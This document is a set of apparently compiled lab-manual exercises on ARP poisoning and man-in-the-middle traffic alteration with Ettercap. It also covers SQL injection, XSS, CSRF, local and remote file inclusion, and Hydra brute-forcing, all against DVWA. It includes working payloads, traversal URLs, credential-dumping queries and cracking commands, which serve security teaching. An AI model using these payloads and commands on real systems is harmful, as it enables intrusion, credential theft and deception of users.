Experiment-5

Object: - ARP Poisoning Attack: Set up an ARP poisoning attack using

tools like Ettercap. Analyze the captured packets to understand how
the attack can lead to a Man-in-the-Middle scenario.

ARP Poisoning and the Usage of Ettercap

Before dive into ARP Spoofing, let understand what is ARP(Address Resolution
Protocol) means. The logical address (IP address) is used by machines to send and
receive messages. But the physical address (MAC address) in layer 2 of the OSI
model is responsible for the actual communication to happen. So we should get
the destination MAC address which helps in communicating with other devices.
This is where ARP comes into the picture. It is the protocol that is responsible for
the mapping of IP addresses to their corresponding MAC addresses. The ARP
protocol provides two basic functions;
• Resolving IPv4 addresses to MAC addresses: For a frame to be placed on the
LAN media, it must have a destination MAC address. When a packet is sent to
the Data Link Layer to be encapsulated into a frame, the node refers to a table
in its memory to find the Data Link Layer address that is mapped to the
destination IPv4 address. This table is called the ARP Table or the ARP Cache.
The ARP table is stored in the RAM of the device. You can view your ARP cache
by issuing the arp -a command in the Command Prompt or Windows
Powershell. Each entry, or row, of the ARP table, has a pair of values as an IP
Address and a MAC address. The relationship between the two values is called
a Map. It simply means that you can locate an IP address in the table and
discover the corresponding MAC address. The ARP table caches the mapping
for the devices on the LAN.
Figure 1: ARP Cache Table
•Maintaining a cache of mappings: The ARP table is maintained dynamically.
There are two ways that a device can gather MAC addresses. One way is
to monitor the traffic that occurs on the local network segment. As a
node receives frames from the media, it can record the source IP and
MAC address as a mapping in the ARP table. As frames are transmitted on
the network, the device populates the ARP table with address pairs.
Another way a device can get an address pair is to broadcast an ARP
request. ARP sends a layer 2 broadcast to all devices on the Ethernet LAN.
The frame contains an ARP request packet with the IP address of the
destination host. The node receiving the frame identifies the IP address as
its IP address and responds by sending an ARP reply packet back to the
sender as a unicast frame. This response is then used to make a new entry
in the ARP table. These dynamic entries in the ARP table are
timestamped. If a device does not receive a frame from a particular
device before the expiration of the timestamp. Then the entry for that
device is removed from the ARP table. Additionally, static map
entries can be entered in an ARP table, but this is rarely done. Static ARP
table entries do not expire over time and must be manually removed.
ARP Process of making requests to the IPs outside LAN
Figure 2: Asking for MAC address of Default Gateway

Figure 3: Layer 2 Broadcast in LAN to find Default Gateway MAC

Figure 4: Host B ignores the Broadcast Message

Figure 5: Default Gateway responds to the Broadcast Message with its MAC
Figure 6: Host A update its ARP Cache with IP and MAC address mapping
First of all, Host A is requesting an IP address that is not in the range of the Local
Area network IPs. Therefore, it will ask for the MAC address of the default gateway
IP (192.186.1.254 in this cases) by sending a layer 2 broadcast message to all the
hosts in the LAN. As shown in figure 4, Host B will ignore the message as it is not
matching with its IP. But router default gateway recognizes it as its IP address and
responds to Host A by including the MAC address in the response. After that, Host
a will dynamically cache that mapping in ARP cache. Now whenever sending traffic
to the outer networks, Host A will use that MAC address together with the default
gateway IP address for the generation of frames for the Data Link Layer of the OSI
model.
ARP Spoofing/Poisoning
ARP Spoofing is a technique where the attacker sends Malicious ARP Packets to
the default gateway and to the host who is communicating with the default
gateway in the local area network. The main intention is to associate the
attacker’s MAC address with the IP address of another host, such as the default
gateway, causing any traffic meant for that IP address to be sent to the attacker
instead. It allows the attacker to modify traffic and intercept data frames. As a
result, leading to a comma attacking terminology called the Man in the
Middle Attack (MITM).
Figure 7: Now Host B which is the Unethical Hacker/Attacker launch an ARP
Poisoning Attack

Figure 8: Hacker modified the ARP Cache of Host A

Figure 9: Re-route the traffic of Host A to the Attacker
Figure 10: After reading data packets Attacker route the traffic to Default
Gateway
Imagine the Host B in the above scenario is an Unethical Hacker/Attacker. He/She
can use some hacking tools like Ettercap and modify the ARP cache of the host and
default gateway. Then listen and capture the data frames exchange between
them. Let see how we can use a tool like Ettercap to achieve such tasks.
Usage of Ettercap
If you have a Kali Linux operating system Ettercap program is by default installed in
the system. Ettercap is a graphical interface that’s very beginner-friendly, unlike
many of the programs that are command-line-based only. If you don’t have it in
your system by default, use the following command to install it.
> apt install ettercap-graphical

Figure 11: Kali Linux Operating System

Figure 12: Open the Ettercap Program

Figure 13: Ettercap Home Screen

Figure 14: Click The Tick icon on the top right corner to run the Ettercap
First, open the Ettercap program then you will get the display as shown in figure
13. Then click the Tick icon on the top right corner to run the Ettercap programs,
as shown in figure 14. After that click the Three Dot icon and go inside Host. After
that, select the Scan for hosts option. To display the list of scanned hosts on the
network, again go inside the Host and select the Host list option. Now you can see
the hosts available in the local network, as shown in figure 19 below.
Figure 15: Host option inside Three dots icon

Figure 16: Scan for host option inside Host option

Figure 17: Scanning Summary

Figure 18: Host list option inside Host option

Figure 19: Summary of the list of hosts available inside the local network
To initiate the ARP poison attack click on the host and the default gateway to add
them to the target, as shown in figures 20 and 21. After that, to start the ARP
poison attack, click the Globe Icon in the top right corner and select the ARP
Poisoning MITM option, as shown in figure 22. Now, as the attacker, you can use
the Wireshark tool to trace the packet transfer between the host and the default
gateway. Let’s image as the victim you are communicating with the HTTP protocol-
based website. The moment you enter the username and password for that
website, the attacker can filter that traffic and obtain the username and password
through Wireshark, as shown in figures 24 and 25. Also, it will notify the attacker’s
Ettercap program, as shown in figure 26. The password and username are visible
due to the usage of the unencrypted HTTP protocol.
Figure 20: Add Host as a Target in Ettercap

Figure 21: Add Default Gateway as a Target in Ettercap

Figure 22: Selecting ARP poisoning option to start the ARP poison MITM

Figure 23: Filter ARP request in Wireshark

Figure 24: Filter frames that contain PWD (password) field

Figure 25: Explore PWD (password) field in Wireshark as messages are not
encrypted since using the HTTP protocol
Figure 26: Ettercap automatically detect and display packets or frames with PWD
(password) fields
Nowadays, ARP Poisoning is rare and avoided due to reasons like the usage of
encrypted communication in HTTPS protocol, Dynamic ARP Inspection, Static ARP
Entries, VPNs, and Packet Filters.
 MiTM Attack with Ettercap
Man-in-the-Middle attacks can be among the most productive and nefarious
attacks. If the attacker/hacker can place themselves between two systems
(usually client and server) they can control the flow of traffic between the two
systems. In this way they can eavesdrop on the traffic, delete the traffic, inject
malware and even alter the traffic (imagine altering email!). In previous tutorials, I
showed you how to arpspoof and dnsspoof to execute a MiTM attack, but in this
tutorial we will use a GUI MitM tool known as Ettercap.

Ettercap is probably the most widely used MiTM attack tool (followed closely
behind by Cain and Abel, which we will look at in the later tutorial).

Ettercap was developed by Albert Ornaghi and Marco Valleri. It basically a suite of
tools to simplify MiTM attacks. It can be used either from the command line (CLI)
or the graphical user interface (GUI). In this lesson, we will use the GUI.
Ettercap enables us to place ourselves in the middle between two machines and
then;
• infect the traffic with malware
• delete traffic
• sniff passwords
• provide fake certificates for HTTPS
• DNS spoof
The principles and techniques of a MiTM attack remain the same as with arpspoof
with the small exception of the ip_forward. Unlike arpspoof, ettercap does not
use ip forwarding in the Linux kernel, but instead uses it own module to forward
IP packets.
It important to note that ettercap requires root privileges to open its Layer 2
(datalink) sockets. In addition, as you might expect, it can slow down
communication between the two target systems as it does its own processing.
Ettercap is GUI based tool built into Kali so need to download and install anything,
so let's get started doing a MiTM attack with Ettercap.
Step #1: Start ettercap
Let's view the help file for ettercap by typing;
kali > ettercap -h

As you can see, ettercap has a significant help file for running it from a command
line, but the only thing we need from here is the switch to run it in graphical
mode. In the bottom line of the screenshot (not the bottom line of the actual help
file as I have truncated it in the interest of space), you can see the -G switch. This
after the command ettercap will launch the ettercap GUI.
kali > ettercap -G
When we do, the ettercap GUI will start as seen below.

The first step in launching our MiTM attach is to start sniffing. Go to pulldown
menu that says "Sniff" and click on "Unified Sniffing".

When we do that, it opens a new window asking us what interface we want to

use and defaults to eth0.
When we click "OK", ettercap launches it sniffing and loads its plugins.

Our next step to find the hosts on the network. Click on the "Hosts" tab and you
will see a menu that includes "Scan for Hosts". Click on it and ettercap will begin
scanning the network for hosts.
Now, using that same "Hosts" tab, click on "Hosts List". This will display all the
hosts that ettercap has discovered on your network as seen in the screenshot
below.

Now, select one of the hosts that will be the target of this attack in the window by
clicking on it and then click on "Add to Target 1" at the bottom of the window.
When you do so, ettercap will add that host as the first target in our MiTM attack
as seen in the screenshot below.
Next, select the second host in this attack and then click "Add to Target 2".

Finally, go to the menu above and click on MITM tab and the drop down menu
will have a selection called "ARP Poisoning" as seen in the screenshot below.
Select it and it will open a pop window like below. Select "Sniff remote
connections".
When we press OK, ettercap will begin ARP poisoning and you will see ettercap
respond in its main windows with the message below.

Now, we have successfully placed ourselves between the two targets systems and
all their traffic must flow through us. This is where the fun begins as we can now
delete, manipulate, impersonate and view all their traffic.
Altering the Traffic
As I mentioned above, the real risk in a MiTM attack is that the attacker can
eavesdrop on the Internet traffic as well as alter it, if they want. In this section,
now that we are between the two systems we will demonstrate the risks of MiTM
attack. We will use the MiTM attack to edit/alter the Internet traffic as seen by
the target. In this way, the attacker can actually alter the content of websites,
alter the content of an email, change the pictures seen by the target in their
Internet traffic, delete specific Internet traffic packets, etc. The message should
be clear, when we have placed ourselves in the middle, the target is at our mercy!
Step #2: Alter the Traffic
In this next section, we will be altering the traffic from an internal corporate
Intranet site. This site is used by all the employees for corporate announcements,
scheduling, etc. Although this scenario is within a corporate Intranet within a LAN,
the technique and effect would be the same over the wider Internet. In our
scenario, the manager has posted a new starting time for the following day
because of a very heavy work load. As a result, he wants everyone to begin work
at 6 am and he posts this to the corporate intranet site for all the employees to
see. Our attacker has malicious intentions toward the target and wants to alter
the message to the target so that they instead come to work late, at 11 am. This is
likely to have negative repercussions for the target from the manager, exactly
what the attacker wants.
Step #3, Create the Intranet Site
The corporate Intranet announcement page looks like the screenshot below.
Everyone in the department will see it and although they are disappointed in the
earlier start time, they adjust their schedule to help with the additional workload.
Our attacker doesn't want the target to see this message, but rather an altered
message to mislead him as to the new starting time.

Step #4: Using Ettercap Filters

One of the many beauties of using Ettercap for MiTM attacks is the ease with
which you can alter and edit the target's Internet traffic.
From the Ettercap GUI, you will see above the top menu bar a pull down menu
item labeled "Filters". Click on it and then Click on "Load a Filter".
When you do so, a window like that below will appear. We can see to the right of
the window, numerous filter files.

Let's take look at the contents of that directory (/usr/share/ettercap) from a

terminal in Kali. Open a terminal and type;
kali > cd /usr/share/ettercap
kali > ls -l

As you can see in the screenshot above, there are numerous Ettercap filter files.
Note the one named etter.filter.examples. Let's open it with Leafpad and see
what it contains.
kali > leafpad etter.filter.examples
 This file contains numerous Ettercap filter examples of various types. We can use
these as templates for creating our own filters. Notice the various types;
• display a message on port 22
• log all telnet traffic
• log all traffic except http
• do some operation on the payload of the packet (in this case change numeric
values)
• drop any packet containing a particular word or string
• log SSH decrypted packets matching a regular expression
• and many more
In our case, we want to replace words from a website with other words to alter
the meaning of the message. That is, we want to replace "Heavy" with "Light" and
"6" with "11" so that the message read by the target would be changed to:
Due to the Light Workload, Everyone is Expected to Come to Work at 11am
Ettercap has a pre-built filter file for doing precisely that! It's the etter.filter file.
Let's open it with Leafpad and take a look around.
kali > leafpad etter.filter

Notice, starting with Line 21 after the comments, we have some simple code that
searches for TCP traffic (if (ip.proto == TCP)) and it contains data that matches the
word "ethercap" (search (DATA.data, "ethercap")) then log and replace it with
ettercap (replace("etthercap", "ettercap") ) and create message of what
happened (msg("Correctly substituted and logged. \n")) We can use this same
code, but replace the words it is looking for and replacing it with the words we
want to replace, namely "Heavy" and "6".
Next, we have to edit this Ettercap filter file. First, copy and paste all the
uncommented code so that you now have two stanzas. Then replace the word
"ethercap" with "Heavy" in the first stanza and in the second stanza, replace the
word "ethercap" with "6" as seen the screenshot below.
Make all the changes circled in the screenshot above and save the file.
Step #5: Compile the Filter
Now, before can use the filter, we must compile it. Open a terminal and type;
kali >etterfilter etter.filter -o etter.filter.heavy
Where:
etterfilter is the command to compile the filter file
etter.filter is the input file
-o etter.filter.heavy directs the compiled output to a new file
Step #6: Add the Filter to Ettercap
Now that filter file has been recompiled and ready to use, we can go back to the
Ettercap GUI and select "Filters" and now, click on our compiled new filter that we
created. When it appears in the "Selection" window, go ahead and click OK. This
should now activate an automatic process whereby, in real time, whenever the
word " Heavy" is seen in the Internet traffic it, is replaced with "Light" and
whenever the number "6" appears, it replaces it with "11". It's important to note
that this replacement with take place on ALL internet traffic coming to the target.
Now, when the target goes to the Intranet site announcing the new starting time,
they will see the following web page as seen below. Everyone else will see the
actual Intranet site, but the target will have those two words changed.

This tutorial demonstrates how easy a MitM attack is using ettercap and the
power of being able to alter the traffic to the target system seamlessly and
transparently. The end-user has no indication that their traffic has been altered!
 Experiment-6
Object: - SQL Injection: Use DVWA to practice SQL injection attacks.
Demonstrate how an attacker can manipulate input fields to extract,
modify, or delete database information.

Low-Level SQL Injection in DVWA

Below is the source code of low-level SQL Injection in DVWA.
<?phpif( isset( $_REQUEST[ ‘Submit’ ] ) ) {// Get
input$id = $_REQUEST[ ‘id’ ];// Check database$query =
“SELECT first_name, last_name FROM users WHERE user_id =
‘$id’;”;$result =
mysqli_query($GLOBALS[“___mysqli_ston”], $query ) or die(
‘<pre>’ . ((is_object($GLOBALS[“___mysqli_ston”])) ?
mysqli_error($GLOBALS[“___mysqli_ston”]) :
(($___mysqli_res = mysqli_connect_error()) ?
$___mysqli_res : false)) . ‘</pre>’ );// Get
resultswhile( $row = mysqli_fetch_assoc( $result ) ) {//
Get values$first = $row[“first_name”];$last =
$row[“last_name”];// Feedback for end userecho “<pre>ID:
{$id}<br />First name: {$first}<br />Surname:
{$last}</pre>”;}mysqli_close($GLOBALS[“___mysqli_ston”]);
}?>

Searching for information

There is a form used to enter the User ID. If I try to input ‘1’, it will appear as
follows:

Form Input User ID ‘1’

To find out if this form has a SQL Injection loophole, we can try it by inputting
single quotes (‘).

Single Quotes Inputting

And the result will be an error. This means we can do SQL Injection.
If you ask why the results can be an error? The answer is because when we input
quotes, the query executed by the server will be as follows:

SELECT first_name, last_name FROM users WHERE user_id = ‘’’;

Seen that there is a quote that does not have a partner, thus making the query an
error.

Doing Attack

After determining that there is a security hole, I try to input the following payload:

%’ or ‘0’ = ‘0

So the result of the query run by the server is:

SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’ = ‘0’;

This will cause all available records in the table to be displayed.

All Available Records Displayed
View DBMS Version

We can also modify the payload. Examples are as follows to view information on
the version of the DBMS being used.

%’ or 0=0 union select null, version() #

The # sign in sql is used to make comments.

So the result of the query run by the server is:

SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select
null, version() #’;
The DBMS Used is MariaDB 10.1.26 Version

View Tables containing the word ‘user’

‘% or 0=0 union select null, version() #

Tables Containing the Word ‘user’

Get users and passwords
%’ UNION SELECT null, concat(user,0x0a,password) FROM users#

0x0a in hexadecimal means 10, and if it is changed to ASCII it means newline.

Users and Passwords

So, how can we reduce this risk? One way to reduce this risk is to use
whitelist/blacklist validation.

Blacklist validation works by detecting if the input contains a forbidden string. This
validation can reject malicious queries like drop tables which can wipe out our
entire data. Whitelist validation works by only accepting input if it belongs to a
reserved string/word. This method can be achieved by checking if the input is an
integer or providing a list of inputs on the front-end.
 Experiment-7
Object: - Cross-Site Scripting (XSS): Exploit XSS vulnerabilities in
DVWA to inject malicious scripts into web pages. Show the potential
impact of XSS attacks, such as stealing cookies or defacing websites.

Cross Site Scripting (XSS) | DVWA(Damn Vulnerable Web

Applications)
XSS is a technique in which attackers inject malicious scripts into a target website
and may allow them to gain access control of the website. If a website allows
users to input data like comment, username field and email address field without
controls then attacker can insert malicious code script as well.

TYPES OF XSS:

1. Reflected XSS

2. Stored XSS

3. Dom Base XSS

Reflected XSS(cross site scripting):RXSS

In this case, hacker data is not stored on the website. reflected XSS only execute
on the victim side. reflected cross-site scripting A hacker sends input script that
website then reflected back to the victim’s browser, where hacker it executed the
malicious JavaScript payloads.

Let’s try cross site scripting virtual environment

Requirements:

1. Xampp or wamp

2. DVWA (Damn vulnerable web application)

3. Browser like Firefox, explorer, Cyberfox, Chrome e.t.c

DVWA low level Reflected XSS:

Payload: <script>alert(“xss”)</script>

DVWA Medium Level Reflected XSS

Payload : <Script>alert(“hack by falcon”)</Script>

DVWA High Level Reflected XSS

Payload: <img src=x onerror=alert(“falcon”)>

Stored XSS (Cross site scripting):SXSS

Stored cross-site scripting (XSS) In this case the hacker malicious code is stored
target website and the web server. when an attacker can send malicious
JavaScript into the website and that script is executed other users’ computers that
is stored (XSS) cross-site scripting.

DVWA Low Level Stored XSS:

Payload: <script>alert(document.domain)</script>
DVWA Medium Level Stored XSS

Payload : <img src=x onerror=alert(document.domain)>

DVWA High Level Stored XSS

Payload : <body onload=alert(“bingo”)>

DOM BASE XSS:

Dom base (XSS) cross-site scripting attack is a short-form document object model
based cross-site scripting. That is, the page itself HTTP response does not change,
An attacker may use several DOM objects to create a Cross-site Scripting attack.
The most popular objects from this perspective are documents.URL,
document.location, and document.referrer.

DVWA low level DOM XSS:

Payload:
localhost/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script>
DVWA Medium level DOM BASE:

Payload:
localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert(1)</script>
and reload your browser.

DVWA HIGH LEVEL DOM BASE:

Payload:
localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert(document.
cookie)</script> and reload browser.
 Experiment-8
Object: - Cross-Site Request Forgery (CSRF): Set up a CSRF attack in
DVWA to demonstrate how attackers can manipulate authenticated
users into performing unintended actions.

DVWA CSRF (low, Medium, High)

CSRF, which stands for Cross-Site Request Forgery, is a type of attack where
someone takes advantage of a user’s active session on a website to make them
unintentionally perform actions they didn’t intend to. This attack works when the
user is already logged into the website or application.

DVWA Security Low

Source code

The flaw in this code is that it lacks proper CSRF protection. It allows an attacker to
craft a malicious URL and trick a logged-in user into unknowingly executing
unwanted actions on their behalf.

The vulnerability lies in the fact that the code doesn’t include any mechanism to
verify the origin of the request. As a result, an attacker can construct a URL
containing the necessary parameters (password_new and password_conf) and
send it to a victim. If the victim clicks on the malicious link while authenticated on
the vulnerable website, the code will execute the password change without any
further authentication or user consent.

Now, We are going to perform the attack

First, I will Create a new password “123” and click on Change

After changing the password you can see in the url is that it lacks the necessary
CSRF token. In the absence of CSRF protection, an attacker can still exploit this
vulnerability by tricking the victim into clicking on the URL while logged in to the
vulnerable website.

Now we will Display the HTML code for the page, which includes a link to
download a game called “FIFA 2023. and password has been changed by attacker”

If attacker send this link to the victim, the password will be changed.
If the victim tries to open the html page. It will looks like this….
When victim tries to click on the FIFA link, the password “12345” will be changed
automatically

We can see that password has been changed

Security: Medium

First things first, lets change the security level of the DVWA.
If we try to use low security method then it wont work anymore

Low

As we Know, we will first view the source code

The flaw in this code is a Cross-Site Request Forgery (CSRF) vulnerability. The code
uses the HTTP Referer header to check if the request came from the same server,
assuming it’s a trusted source. However, the Referer header can be easily
manipulated by an attacker. This allows an attacker to create a malicious website
or craft a URL that makes a request to this script, tricking the user’s browser into
performing an unwanted action on their behalf, such as changing their password
without their knowledge or consent.

Can you see the difference? Within the legitimate request we see there is a
Referer, where the request came from. That matches up so the request goes
ahead.
So what if we intercept the illegitimate request with Burp and add the HTTP
Referer. Like so.

Paasword changed sucessfully

Now we will try to intercept the website and add legitimate Referrer using
burpsuite
 Experiment-9
Object: - File Inclusion Vulnerabilities: Explore remote and local file
inclusion vulnerabilities in DVWA. Show how attackers can include
malicious files on a server and execute arbitrary code.

Understanding File Inclusion Attack using DVWA web

application.
What is File Inclusion Attack?

It is an attack that allows an attacker to include a file on the web server through a
php script. This vulnerability arises when a web application lets the client submit
input into files or upload files to the server. A file include vulnerability is distinct
from a generic Directory Traversal Attack, in that directory traversal is a way of
gaining unauthorized file system access, and a file inclusion vulnerability subverts
how an application loads code for execution. Successful exploitation of a file
include vulnerability will result in remote code execution on the web server that
runs the affected web application.

This can lead to the following attacks:

1. Code execution on the web server

2. Cross Site Scripting Attacks (XSS)

3. Denial of service (DOS)

4. Data Manipulation Attacks

Two Types:

a) Local File Inclusion

b) Remote File Inclusion

LFI vulnerabilities allow an attacker to read (and sometimes execute) files on the
victim machine. This can be very dangerous because if the web server is
misconfigured and running with high privileges, the attacker may gain access to
sensitive information. If the attacker is able to place code on the web server
through other means, then they may be able to execute arbitrary commands.

RFI vulnerabilities are easier to exploit but less common. Instead of accessing a file
on the local machine, the attacker is able to execute code hosted on their own
machine.

Remote File inclusion (RFI) and Local File Inclusion (LFI) are vulnerabilities that are
often found in poorly-written web applications. These vulnerabilities occur when a
web application allows the user to submit input into files or upload files to the
server. In order to demonstrate these attacks, we will be using the Damn
Vulnerable Web Application (DVWA).

there are some pre-requisites required:

1. XAMPP
2. Damn Vulnerable Web Application (DVWA)

NOTE: Currently, lets focus on file inclusion attacks. I am going to show you how to
setup lab using xampp, dvwa and many more in my next upcoming blogs.

Local File Inclusion in Action

Since you have an idea what LFI is, let’s see it in action. We will perform LFI attacks
through different levels of difficulty offered by DVWA.

Let’s start with low difficulty.

Difficulty: LOW

Now start your machine and login to DVWA, then go to DVWA security tab and
change the difficulty level to low.

Go to file inclusion tab and change the URL

from incude.php to ?page=../../../../../../etc/passwd.
Change the URL
from?page=../../../../../../etc/passwd to ?page=../../../../../../proc/version.
Difficulty: MEDIUM

Now, go on and try the exploits we used in low difficulty. You will notice that you
can’t read files like before using the directory traversal method. So, as you can see
in the below snapshot of source page, the server is more secure and is filtering the
‘../’ or ‘..\’pattern. Let’s try to access the file without ‘../’ or ‘..\’.

Change include.php to /etc/passwd

Now,change the URL from?page=/etc/passwd to ?page=/proc/version.

As you can see, it worked by directly entering the name of the file. Let’s level up
the difficulty to HIGH.

Difficulty: HIGH

Change the difficulty to HIGH and try all exploits from medium difficulty, and you’ll
notice none of them will works because the target is more secure, as it is only
accepting “include.php” or inputs starting with the word “file”. If you try anything
else, it will show “File not Found”.
In this level of security, we can still gather sensitive info using the “File” URI
scheme. (because it starts with the word “file”)

Change the URL from include.php to ?page=file:///etc/passwd

You will get the data of /etc/passwd file.

This is how you can exploit file inclusion vulnerability using local files on the
webserver.
Remote File Inclusion in Action

Now, let’s try to exploit this vulnerability using remote files hosted on the attacker
machine.

Difficulty: LOW

Now, Let’s start with the Low difficulty.

Change the difficulty to low and go to file inclusion tab.

Let’s change include.php to http://www.google.com so the final URL will look

something like this,

?page=http://www.google.com
Difficulty: MEDIUM

Change the difficulty to medium and check as we did it in the low difficulty. You’ll
notice, it’s not working anymore. The target is now filtering “http” and “https” as
shown in source page.
so try the attack with “HTTP” (in CAPS) or any one word in caps like I used as
shown in snapshot (httP)and it’ll work.

?page=httP://imdb.com

Difficulty: HIGH

We can’t exploit the high difficulty using RFI as you can see in source page,we
know that the target web-server is only accepting “include.php” or anything that’s
starting with the word “file” that’s why we can’t include anything from an outside
server.

Points to Secure against File Inclusion Vulnerability

a) Strong Input Validation.

b) A whitelist of acceptable inputs.

c) Reject any inputs that do not strictly conform to specifications.

d) For filenames, use stringent whitelist that limits the character set to be used.

e) Exclude directory separators such as “/”.

f) Use a whitelist of allowable file extensions.

g) Environment Hardening.

h) Develop and run your code in the most recent versions of PHP available.

i) Configure your PHP applications so that it does not use register_globals.

j) Run your code using the lowest privileges.

 Experimetn-10
Object: - Brute-Force and Dictionary Attacks: Use DVWA to simulate
login pages and demonstrate brute-force and dictionary attacks against
weak passwords. Emphasize the importance of strong password
policies.

DVWA: Brute Force

Modern brute force attacks can now easily crack 8-characters alphanumeric
password in just a mere 2 hours, while more advanced encryption hashes can be
cracked in a few months. This can be achieved by performing exhaustive key
search, in which the computer will try every possible combination of every single
possible character in order to find the right combination of characters as the
password. For the purpose of this demonstration, I will be setting up the Damn
Vulnerable Web Application (DVWA) to simulate a brute force attack.

The attack will utilize Hydra as a parallelized login cracker and the ‘rockyou.txt’
wordlist that will be demonstrated on the login form below.
Initially, barely any information was disclosed. However, a wild guess would be to
use one of the most popular usernames on any web application, which is “admin”.
Before proceeding with the attack, we must first collect more information. Open a
Burp Suite browser and direct it to the DVWA page, which will look exactly like the
one on a regular browser. Now, try logging in using a random password. For this
attempt, the username “admin” and password “admin123” was used. For Burp
Suite to scan the web application, turn on the Intercept mode right before clicking
on the “Login” button.

As expected, the credentials entered were wrong, displaying an error message

saying, “Username and/or password incorrect”. Now, head back to Burp Suite and
view the raw data of the connection request.
Through this, we have gathered several more information that may be useful (e.g.,
session cookies, parameters of the request). The following table includes all the
gathered information:
The next step is to use Hydra to crack the account password. There is no fixed
format to Hydra’s command as it will depend on the elements and/or information
known to the pentester (e.g., username, hostname, URL service, and cookies).
Considering the list of disclosed information and available parameters obtained
during the vulnerability assessment step utilizing Burp Suite, the command used
for this demonstration will be:

hydra 127.0.0.1 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form

"/dvwa/vulnerabilities/brute:username=^USER^&password=^PASS^&Login=Login:H=
Cookie\:PHPSESSID=9cei1q7s10h39gdp538to6f3ut;security=low:F=Username and/or
password incorrect."

With the incorporation of all the elements and components listed on the table,
Hydra will systematically attempt the various combinations of passwords from the
‘rockyou.txt’ wordlist in an attempt to crack the password for the “admin”
account.
The result of the attack reveals the password to be “password”, which will show
that the login is successful, hence concluding the demonstration.
The demonstrated attack proves how easy malicious actors can breach through
accounts with weak passwords. Therefore, it is always important to set a password
that complies with the standardized strong password policy or instead incorporate
the use of a more robust passphrase.